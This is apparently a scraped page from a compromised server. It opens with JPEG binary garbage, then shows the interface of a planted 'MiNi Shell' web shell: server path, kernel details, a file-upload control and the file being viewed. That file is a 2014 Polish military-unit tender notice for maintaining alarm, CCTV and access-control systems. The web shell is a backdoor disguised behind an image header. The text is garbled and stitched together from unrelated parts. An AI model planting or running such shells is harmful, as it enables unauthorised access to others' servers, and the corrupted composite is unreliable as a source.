JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140127/29828-N-2014.html

<p class="kh_header"><b>Łask: Naprawa oraz konserwacja i przegląd techniczny systemów zabezpieczeń technicznych</b><br>
<b>Numer ogłoszenia: 29828 - 2014; data zamieszczenia: 27.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 1158 , ul. 9 Maja, 98-100 Łask, woj. łódzkie, tel. 043 6770900, faks 043 6770709.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.32blot.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Skarb Państwa - Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Naprawa oraz konserwacja i przegląd techniczny systemów zabezpieczeń technicznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest naprawa oraz konserwacja i przegląd techniczny systemów zabezpieczeń technicznych:
1.1. część I - naprawa systemów zabezpieczeń technicznych w JW 1158 
1.2. część II - jednorazowa konserwacja i przegląd techniczny systemów zabezpieczeń technicznych w obiektach JW 1158 zlokalizowanych w kompleksach wojskowych:
1.2.1. Nr 3961, 3962 - Łask;
1.2.2. Nr 6030 - Teodory;
1.2.3. Nr 4585 - Wronowice;
1.3. część III - jednorazowa konserwacja i przegląd techniczny systemów zabezpieczeń technicznych w obiektach JW 1551 zlokalizowanych w kompleksach wojskowych:
1.3.1. Nr 2617 - Sieradz;
1.3.2. Nr 2618 - Sieradz.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.61.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda od wykonawców wniesienia wadium w wysokości 1 200,00 PLN dla całości zamówienia lub:
1.1. część I -    900,00 PLN
1.2. część II -    200,00 PLN;
1.3. część III -   100,00 PLN.
2. Dopuszcza się złożenie wadium w różnej formie prawnej, wedle zasad podanych w ustawie Pzp.
3. W przypadku wniesienia wadium w pieniądzu powyższą kwotę należy wpłacić przelewem na rachunek bankowy Jednostki Wojskowej 1158 nr 72 1010 1371 0024 1113 9120 0000 z adnotacją: wadium na Naprawę oraz Konserwację i przegląd systemów alarmowych, nr sprawy 14/PN/2014. 
4. Wadium wnosi się przed upływem terminu składania ofert tj. do 05.02.2014 r. do  godz. 1100. Przy czym za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku bankowym zamawiającego. 
5. Wykonawca, którego oferta nie będzie zabezpieczona akceptowaną formą wadium zostanie wykluczona z postępowania. 
6. Zamawiający zwraca wadium, na zasadach określonych w art. 46 ustawy Prawo zamówień publicznych</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, iż:
1. posiada uprawnienie do wykonywania działalności stanowiącej przedmiot zamówienia, a w szczególności posiada ważną koncesję wydaną przez Ministra Spraw Wewnętrznych i Administracji na prowadzenie działalności gospodarczej w zakresie usług ochrony mienia realizowanych w zakresie zabezpieczenia technicznego;
2. posiada świadectwo bezpieczeństwa przemysłowego min. III stopnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, iż:
1. w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności gospodarczej przez Wykonawcę jest krótszy - w tym okresie, należycie wykonał lub wykonuje, co najmniej dwie usługi o charakterze tożsamym z przedmiotem zamówienia na kwotę minimum 20 000 zł każda, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, iż:
1. dysponuje kancelarią tajną</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, iż:
1. dysponuje odpowiednią ilością pracowników zapewniającą realizację usługi, przy zachowaniu obowiązujących przepisów, zwłaszcza prawa pracy, którzy posiadają:
1.1. licencję I lub II stopnia zabezpieczenia technicznego dla pracowników wykonujących prace konserwacyjne i serwisowe systemów alarmowych;
1.2. świadectwa ukończenia kursów w zakresie instalacji lub projektowania systemów alarmowych;
1.3.	poświadczenia bezpieczeństwa osobowego upoważniające do dostępu do informacji niejawnych o klauzulach min. POUFNE - kierownictwo wykonawcy oraz pracownicy wskazani do realizacji zamówienia;
2. dysponuje pełnomocnikiem ochrony posiadającym poświadczenie bezpieczeństwa osobowego upoważniające do dostępu do informacji niejawnych o klauzulach minimum POUFNE;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca złoży oświadczenie, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Na ofertę składają się następujące dokumenty i załączniki:
1.1. formularz ofertowy wypełniony i podpisany przez Wykonawcę z wykorzystaniem wzoru - załącznik nr 1 do SIWZ;
1.2. formularz cenowy wypełniony i podpisany przez wykonawcę z wykorzystaniem wzoru  -  załącznik nr 4 do SIWZ;
1.3. oświadczenie o spełnianiu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 i braku podstaw do wykluczenia z art. 24 ust. 1 i 2 Prawa zamówień publicznych z wykorzystaniem wzoru - załącznik nr  2 do SIWZ;
1.4. oświadczenie o przynależności do grupy kapitałowej - załącznik nr 9 do SIWZ;
1.5. w przypadku, gdy upoważnienie do podpisania oferty nie wynika z dokumentów rejestrowych, do oferty należy załączyć stosowne pełnomocnictwo dla osoby podpisującej ofertę. Dołączone do oferty pełnomocnictwo powinno jednoznacznie określać postępowanie, do którego się odnosi i precyzować zakres umocowania;
1.6. potwierdzenie wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Referencje - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. zmiana w zakresie wykonywania przedmiotu zamówienia w przypadku zmian legislacyjnych przepisów aktów prawnych wyszczególnionych w niniejszej umowie wymuszających zmiany w zakresie wykonywania przedmiotu zamówienia;
2. zmiana postanowień umowy w zakresie przesunięcia terminu ich wykonania;
3. zmiana postanowień umowy może nastąpić w przypadku wystąpienia okoliczności, których strony nie mogły przewidzieć w chwili jej zawarcia. W szczególności dotyczy to wystąpienia niekorzystnych warunków atmosferycznych, zmian decyzji dotyczących restrukturyzacji sił zbrojnych, zmniejszenia środków finansowych, zmiany obowiązujących przepisów dotyczących przedmiotu zamówienia itp. Zamawiający nie będzie ponosił ujemnych skutków finansowych i prawnych spowodowanych zmniejszeniem ilości zamawianych usług przewidzianych w umowie;
4. w celu dokonania zmiany zapisów umowy wnioskowanych przez Stronę, zobowiązana jest ona pisemnie wystąpić z propozycją zmiany warunków umowy wraz z ich uzasadnieniem</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.32blot.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa Nr 1158, ul. 9-go Maja 95, 98-100 Łask.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.02.2014 godzina 11:00, miejsce: Ofertę należy przesłać na adres Zamawiającego podany w punkcie 1 SIWZ lub składać osobiście w siedzie zamawiającego, kancelaria jawna, budynek sztabu,  pokój nr 127.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Naprawa systemów zabezpieczeń technicznych w JW 1158.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawa systemów wg opisu technicznego uszkodzeń systemów zabezpieczenia technicznego - załącznik nr 10 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.61.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Referencje - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Jednorazowa konserwacja i przegląd techniczny systemów zabezpieczeń technicznych w obiektach JW 1158 zlokalizowanych w kompleksach wojskowych:
1. Nr 3961, 3962 - Łask;
2. Nr 6030 - Teodory;
3. Nr 4585 - Wronowice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Konserwacja i przegląd techniczny winny być wykonane przy spełnieniu norm:
1.1. PN-EN 50131-1:2009 Systemy alarmowe - systemy sygnalizacji włamania i napadu wymagania systemowe, ogólne, podstawowe; 
1.2. PN-50131-3 :2009 Systemy alarmowe - systemy sygnalizacji włamania i napadu centrale alarmowe;
1.3. PN-EN 50131-2-2:2009 Systemy alarmowe - systemy sygnalizacji włamania i napadu czujki sygnalizujące włamanie, pasywne czujki podczerwieni;
1.4. PN-EN 50131-2-4:2009 Systemy alarmowe - systemy sygnalizacji włamania i napadu dualne czujki pasywnej podczerwieni i mikrofalowe;
1.5. PN-EN 50131-2-3:2009 Systemy alarmowe - systemy sygnalizacji włamania i napadu czujki mikrofalowe; 
1.6. PN-EN 50131-2-5:2009 Systemy alarmowe - systemy sygnalizacji włamania i napadu dualne czujki pasywne i ultradźwiękowe;
1.7. PN-EN 50131-2-6:2009 Systemy alarmowe - systemy sygnalizacji włamania i napadu czujki magnetyczne;
1.8. PN-EN 50131-5-3:2009 Systemy alarmowe - systemy sygnalizacji włamania i napadu systemy bezprzewodowe;
1.9. PN-EN 50131-6:2008 Systemy alarmowe - systemy sygnalizacji włamania i napadu zasilacze;
1.10. PN-EN 50132:2002 Systemy alarmowe - systemy dozorowe CCTV;
1.11. PN-EN 50133:2002 Systemy alarmowe - systemy kontroli dostępu; 
1.12. PN-EN 50134:2002 Systemy alarmowe osobiste;
1.13. PN-EN 50136:2002 Systemy alarmowe - urządzenia i systemy transmisji alarmu;
1.14. PN-EN ISO/IEC 17050-1 i 2 Deklaracja zgodności;
1.15. NO-04 - A004: 2010 Norma Obronna - Obiekty wojskowe - Systemy Alarmowe. 
2. Zakres robót obejmuje konserwację i przegląd techniczny:
2.1. Systemu sygnalizacji alarmowej i napadu,
2.2. Systemu telewizji dozorowej,
2.3. Systemu zarządzania i kontroli dostępu.
3.Konserwację i przegląd techniczny należy wykonywać w terminie od 01.03.2014 r. do 31.03.2014 r.
4. Wykonawca zobowiązany jest zapewnić unieszkodliwianie wymienionych  uszkodzonych elementów. 
5. Wykonawca zobowiązany jest do utrzymania obszaru na którym są zamontowane bariery mikrofalowe w stanie zapewniającym im prawidłową pracę.
6. Ilość i typ urządzeń podlegających konserwacji zgodnie z załącznikiem nr 6 do SIWZ.
7. Wszelkie usterki, wadliwe działanie oraz prace serwisowe spowodowane zaniedbaniami konserwacyjnymi będą usuwane na koszt Wykonawcy.
8. Wszystkie koszty związane z usługą konserwacji i przeglądów wchodzą 
w zakres przedmiotowego zamówienia.
9. W przypadku wystąpienia konieczności naprawy systemów objętych konserwacją i serwisem w zakres przedmiotowego zamówienia wchodzi usługa naprawy, oprócz kosztów za urządzenia podlegające wymianie. W takiej sytuacji Wykonawca będzie zobowiązany do przedstawienia Zamawiającemu do akceptacji koszt urządzeń uznanych za niesprawne podczas wykonywania prac konserwacyjnych.
10. W przypadku wystąpienia konieczności naprawy systemów, wykonawca przedstawi zamawiającemu kosztorys elementów (osobie wyszczególnionej w umowie) niezbędnych do usprawnienia systemu do akceptacji.
11. Wykonawca udzieli dwuletniej gwarancji na wymienione urządzenia i elementy wspomagające ochronę.
12. Po konserwacji Wykonawca obciąży Zamawiającego fakturą po uprzednim protokólarnym odbiorze wykonanej usługi.
13. Zamawiający zastrzega sobie możliwość zmniejszenia zakresu przedmiotu zamówienia.
14. Wymagana jest należyta staranność przy realizacji zobowiązań umowy.
15. Ustalenia i decyzje dotyczące wykonywania zamówienia podejmowane będą przez Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.61.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Referencje - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Jednorazowa konserwacja i przegląd techniczny systemów zabezpieczeń technicznych w obiektach JW 1551 zlokalizowanych w kompleksach wojskowych:
1. Nr 2617 - Sieradz;
2. Nr 2618 - Sieradz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Konserwacja i przegląd techniczny winny być wykonane przy spełnieniu norm:
1.1. PN-EN 50131-1:2009 Systemy alarmowe - systemy sygnalizacji włamania i napadu wymagania systemowe, ogólne, podstawowe; 
1.2. PN-50131-3 :2009 Systemy alarmowe - systemy sygnalizacji włamania i napadu centrale alarmowe;
1.3. PN-EN 50131-2-2:2009 Systemy alarmowe - systemy sygnalizacji włamania i napadu czujki sygnalizujące włamanie, pasywne czujki podczerwieni;
1.4. PN-EN 50131-2-4:2009 Systemy alarmowe - systemy sygnalizacji włamania i napadu dualne czujki pasywnej podczerwieni i mikrofalowe;
1.5. PN-EN 50131-2-3:2009 Systemy alarmowe - systemy sygnalizacji włamania i napadu czujki mikrofalowe; 
1.6. PN-EN 50131-2-5:2009 Systemy alarmowe - systemy sygnalizacji włamania i napadu dualne czujki pasywne i ultradźwiękowe;
1.7. PN-EN 50131-2-6:2009 Systemy alarmowe - systemy sygnalizacji włamania i napadu czujki magnetyczne;
1.8. PN-EN 50131-5-3:2009 Systemy alarmowe - systemy sygnalizacji włamania i napadu systemy bezprzewodowe;
1.9. PN-EN 50131-6:2008 Systemy alarmowe - systemy sygnalizacji włamania i napadu zasilacze;
1.10. PN-EN 50132:2002 Systemy alarmowe - systemy dozorowe CCTV;
1.11. PN-EN 50133:2002 Systemy alarmowe - systemy kontroli dostępu; 
1.12. PN-EN 50134:2002 Systemy alarmowe osobiste;
1.13. PN-EN 50136:2002 Systemy alarmowe - urządzenia i systemy transmisji alarmu;
1.14. PN-EN ISO/IEC 17050-1 i 2 Deklaracja zgodności;
1.15. NO-04 - A004: 2010 Norma Obronna - Obiekty wojskowe - Systemy Alarmowe. 
2. Zakres robót obejmuje konserwację i przegląd techniczny:
2.1. Systemu sygnalizacji alarmowej i napadu,
2.2. Systemu telewizji dozorowej,
2.3. Systemu zarządzania i kontroli dostępu.
3.Konserwację i przegląd techniczny należy wykonywać w terminie od 01.03.2014 r. do 31.03.2014 r.
